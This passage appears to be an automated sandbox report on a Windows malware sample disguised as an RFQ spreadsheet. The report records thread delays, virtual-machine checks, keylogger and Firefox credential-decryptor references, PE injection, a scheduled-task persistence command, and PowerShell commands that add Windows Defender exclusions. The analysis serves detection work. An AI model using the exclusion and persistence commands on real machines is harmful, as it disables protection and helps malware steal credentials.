                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 596413Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 596307Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 596187Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 596078Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 595968Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 595859Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 595750Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 595640Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 595531Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 595421Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 595312Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 595203Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 595093Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 594982Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 594874Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 594765Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 594656Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 594546Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 594437Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 594328Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeThread delayed: delay time: 594218Jump to behavior
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 240000
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 239812
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 239640
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 239528
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 239422
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 239312
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 239202
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 239081
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 238850
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 238436
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 238328
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 238218
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 600000
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 599890
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 599781
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 599671
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 599562
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 599453
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 599343
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 599234
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 599125
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 599015
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 598906
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 598796
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 598687
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 598578
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 598468
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 598359
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 598249
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 598140
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 598031
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 597922
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 597812
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 597703
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 597591
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 597484
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 597374
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 597265
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 597156
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 597047
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 596935
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 596827
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 596718
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 596609
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 596500
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 596390
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 596280
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 596171
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 596062
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 595949
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 595842
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 595734
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 595625
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 595515
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 595406
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 595296
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 595187
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 595078
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 594968
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 594859
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 594750
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeThread delayed: delay time: 594640
                Source: svchost.exe, 00000008.00000002.2859806714.000001A39D22B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW {
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000007.00000002.3652176424.0000000001776000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllS
                Source: svchost.exe, 00000008.00000002.2863535428.000001A3A2854000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: gNFUFfdz.exe, 0000000D.00000002.3652106868.00000000012B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 13_2_05509548 LdrInitializeThunk,LdrInitializeThunk,13_2_05509548
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                .NET source code references suspicious native API functions
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.49ee880.3.raw.unpack, COVID19.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.49ee880.3.raw.unpack, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.49ee880.3.raw.unpack, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))
                Adds a directory exclusion to Windows Defender
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe"
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gNFUFfdz.exe"
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe"Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gNFUFfdz.exe"Jump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeMemory written: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeMemory written: C:\Users\user\AppData\Roaming\gNFUFfdz.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe"Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gNFUFfdz.exe"Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gNFUFfdz" /XML "C:\Users\user\AppData\Local\Temp\tmpC2F0.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess created: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe "C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gNFUFfdz" /XML "C:\Users\user\AppData\Local\Temp\tmpAC7.tmp"
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess created: C:\Users\user\AppData\Roaming\gNFUFfdz.exe "C:\Users\user\AppData\Roaming\gNFUFfdz.exe"
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
